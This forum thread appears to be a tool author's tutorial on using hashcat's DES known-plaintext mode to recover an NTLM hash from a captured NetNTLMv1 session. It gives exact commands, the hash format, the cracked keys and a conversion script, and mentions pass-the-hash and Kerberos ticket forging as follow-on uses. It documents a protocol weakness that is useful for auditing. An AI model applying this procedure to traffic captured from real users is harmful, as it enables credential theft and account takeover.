atom





Administrator Posts: 5,075

Threads: 226

Joined: Apr 2010 #1



An interessting example, I thought, would be how to retrieve the NTLM out of a captured NetNTLMv1 session. It doesn't matter if you were the server to enforce some challenge or if you sniffed it from the wire.



Note: The way we do it here will also work for cracking MSCHAPv2 or WPA2 Enterprise.



So, basically what we're looking in NetNTLMv1 is the challenge and a 24 byte bytestream. To get them you can use metasploit or other tools, but I don't want to focus that here. For details how to get them, check out this page:



You end up in a string that looks like the following: $99$ESIzRFVmd4hye041+UcSnqUrnN7a6Gk0WGw=



First we need to decode the base64, remove the $99$ signature and do this:



Code: root@et:~/hashcat# echo -n 'ESIzRFVmd4hye041+UcSnqUrnN7a6Gk0WGw=' | base64 -d | xxd

00000000: 1122 3344 5566 7788 727b 4e35 f947 129e ."3DUfw.r{N5.G..

00000010: a52b 9cde dae8 6934 586c .+....i4Xl

root@et:~/hashcat# The first 8 byte are the challenge, which will be our data part in the DES cracking later.



The next 16 byte are 2 of 3 DES encrypted messages. If we manage to crack both of them we can reconstruct the NTLM out of it. This is our goal and it's guaranteed, it will just take some time.



The next 2 byte is the decrypted message of the third DES message. So yes, this one is already cracked, which was possible because the search space is pretty small (0x10000). We don't need to crack this anymore. Note: This will be the last 2 byte of the final NTLM.

If you're interessted in a detailed analysis of this, check this page:



So we end up in the following information:

CT1: 727b4e35f947129e



CT2: a52b9cdedae86934



PT3: 586c



CHAL: 1122334455667788

Now, to hashcat. We want to crack CT1 and CT2. Luckily, both have been generate with the same plaintext message (challenge). This means that we can multihash attack them. We will crack both for the price of one. From a math perspective, the keyspace to search is 2^56, not not 2*(2^56).



To make use of hashcat's DES KPA cracking with just need two informations. The ciphertext and the plaintext. Both must be exactly 8 byte. Both need to be given in hex notation. So the hashes look like this:



Code: root@et:~/hashcat# cat hashes.txt

727b4e35f947129e:1122334455667788

a52b9cdedae86934:1122334455667788

root@et:~/hashcat#

And that's it basically. Now we can start hashcat with this:



Code: root@et:~/hashcat# ./hashcat -m 14000 hashes.txt -o cracked.txt -a 3 -1 charsets/DES_full.charset --hex-charset ?1?1?1?1?1?1?1?1 -w 3

...

root@et:~/hashcat#

Some explanations about the commandline:

The -1 charsets/DES_full.charset was added to GitHub with a recent commit and I recommend to use it whenever you're cracking a full DES range



?1?1?1?1?1?1?1?1 The length is always (and exact) 8 byte.

When hashcat is finished you will find the entries in cracked.txt:



Code: root@et:~/hashcat# cat cracked.txt

727b4e35f947129e:1122334455667788:$HEX[8923bdfdaf753f63]

a52b9cdedae86934:1122334455667788:$HEX[17d741d7ddc1c36f]

root@et:~/hashcat#

Now that we've cracked the DES key, we need to decode them back to plain data. I've written a small program "deskey_to_ntlm.pl" to do that, it's part of hashcat-utils now:



Code: root@et:~/hashcat-utils/src# perl deskey_to_ntlm.pl 8923bdfdaf753f63

8846f7eaee8fb1

root@et:~/hashcat-utils/src# perl deskey_to_ntlm.pl 17d741d7ddc1c36f

17ad06bdd830b7

root@et:~/hashcat-utils/src#

Now you can put the substrings together to get the final NTLM:



8846f7eaee8fb117ad06bdd830b7586c



As a proof, that all the above worked correctly, I knew that the NTLM password was "password":



Code: root@ht:~/hashcat-utils/src# echo -n password | iconv -f utf8 -t utf16le | openssl dgst -md4

(stdin)= 8846f7eaee8fb117ad06bdd830b7586c

root@ht:~/hashcat-utils/src#

You know, once you have the NTLM hash, you can do all the funny things like PTH or generate a kerberos ticket out of it or simply crack the NTLM.



- atom Just wanted to make a quick writeup how to use the new DES KPA cracking mode.An interessting example, I thought, would be how to retrieve the NTLM out of a captured NetNTLMv1 session. It doesn't matter if you were the server to enforce some challenge or if you sniffed it from the wire.Note: The way we do it here will also work for cracking MSCHAPv2 or WPA2 Enterprise.So, basically what we're looking in NetNTLMv1 is the challenge and a 24 byte bytestream. To get them you can use metasploit or other tools, but I don't want to focus that here. For details how to get them, check out this page: https://crack.sh/mschapv2.html You end up in a string that looks like the following: $99$ESIzRFVmd4hye041+UcSnqUrnN7a6Gk0WGw=First we need to decode the base64, remove the $99$ signature and do this:If you're interessted in a detailed analysis of this, check this page: http://davenport.sourceforge.net/ntlm.ht...lmResponse So we end up in the following information:Now, to hashcat. We want to crack CT1 and CT2. Luckily, both have been generate with the same plaintext message (challenge). This means that we can multihash attack them. We will crack both for the price of one. From a math perspective, the keyspace to search is 2^56, not not 2*(2^56).To make use of hashcat's DES KPA cracking with just need two informations. The ciphertext and the plaintext. Both must be exactly 8 byte. Both need to be given in hex notation. So the hashes look like this:And that's it basically. Now we can start hashcat with this:Some explanations about the commandline:When hashcat is finished you will find the entries in cracked.txt:Now that we've cracked the DES key, we need to decode them back to plain data. I've written a small program "deskey_to_ntlm.pl" to do that, it's part of hashcat-utils now: https://github.com/hashcat/hashcat-utils...to_ntlm.pl Now you can put the substrings together to get the final NTLM:8846f7eaee8fb117ad06bdd830b7586cAs a proof, that all the above worked correctly, I knew that the NTLM password was "password":You know, once you have the NTLM hash, you can do all the funny things like PTH or generate a kerberos ticket out of it or simply crack the NTLM.- atom Website Find mubix





Junior Member Posts: 1

Threads: 0

Joined: Sep 2016 #2 Awesome stuff! Thanks for making this happen atom. Really appreciate it. Find